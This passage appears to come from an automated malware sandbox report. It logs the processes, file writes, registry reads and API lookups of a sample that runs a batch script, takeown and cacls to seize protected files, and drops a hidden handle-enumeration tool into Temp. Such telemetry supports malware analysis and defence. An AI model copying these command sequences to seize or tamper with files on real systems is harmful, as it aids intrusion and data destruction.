| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0x11a0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "PhotoAcq.dll.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "PhotoAcq.dll.mui" |
|
1 |
Process #118: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #118 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Security\vt mapping.exe" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:52, Reason: Child Process |
| Unmonitor | End Time: 00:03:00, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf98 |
| Parent PID | 0x1088 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F04
0x
F58
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #119: cmd.exe
300
0
| Information | Value |
|---|---|
| ID | #119 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Java\jre1.8.0_144\bin\server\classes.jsa"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:55, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:30 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1204 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
544
0x
F7C
|
Host Behavior
File (227)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
32 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
112 | |
| Open | STD_INPUT_HANDLE | - |
|
11 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
12 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 64 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 18 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 31 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0x1388, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | os_pid = 0x12ec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "classes.jsa" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000002 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = FN, value = "classes.jsa" |
|
1 |
Process #121: mxkefu6a.exe
181
0
| Information | Value |
|---|---|
| ID | #121 |
| File Name | c:\users\fd1hvy\desktop\mxkefu6a.exe |
| Command Line | mxkeFu6a.exe -accepteula -c -y -p handles -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:02:57, Reason: Child Process |
| Unmonitor | End Time: 00:03:28, Reason: Self Terminated |
| Monitor Duration | 00:00:30 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1244 |
| Parent PID | 0x1208 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1254
0x
498
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004080C0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040AE73 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040579A |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040B435 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00409AC9 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00406078 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040DEC6 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00410AB1 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00412434 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x00416A09, 0x00415F2F, ... |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004048D4 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x0040C3C0, 0x004112CE |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Content Changed | - | 32-bit | 0x004020F0 |
|
|
|
| mxkefu6a.exe | 0x00400000 | 0x00476FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | size = 225280 |
|
1 | |
| Write | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe | os_pid = 0x12e4, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75e90000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x761b0000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x750d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75b70000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74b70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x744a0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\desktop\mxkefu6a.exe, file_name_orig = C:\Users\FD1HVy\Desktop\mxkeFu6a.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x75efec50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75efeca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x75ea1170 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75efeac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75ea4be0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75efeb30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x75ea4610 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x75ea4a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75efeed0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75ea5490 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x75efed40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x75ea6520 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77c0a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75ea5a60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x75ea53b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x75ea6800 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x75ea5cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x75ea56c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75efed10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75ea4aa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75ea6740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75efeab0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75ea4f00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x75ea5b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75ea5010 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75efea10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75ea5bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x75ea4cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75ea50d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x75ea5ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x75ea5330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x75ea5b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75ea5b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75ea51b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75ea5090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x75eff5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75efef60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75ea5d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x75eff4c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75eff500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75eff130 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77bfb2d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77bfb250 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x75ea6620 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77bf2dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77c129e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77c11ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75ea3cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75ea5110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75ea5c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x75ea6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75ea57f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75eff450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x75eff4a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75eff4e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75ea46b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75ea8820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77c16390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75ea5ac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77bdfb90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x75efee70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75eff180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75eff440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75ea5960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x75eff090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x75ea5320 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x75ea68d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x75ea6720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75efebb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x75ea6760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x75ea67e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75ea6820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75ea6850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75ea6870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75ea6830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x75ea59c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75ea4ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x75ea5160 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75ea4d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75ea51f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75ea7c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75ea5da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75efea20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75ea5530 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x75ea4eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x75ea4c20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77bef630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x75eff0e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x761cee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x761cf910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x761c8c80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x761cffa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x761cefb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x761cf530 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x761ce5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x761ce580 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x761cf460 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x761cf9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x761ced60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x761cf100 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x75106b00 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x75b747e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x75b74f70 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x75b74ef0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x75b73c10 |
|
1 | |
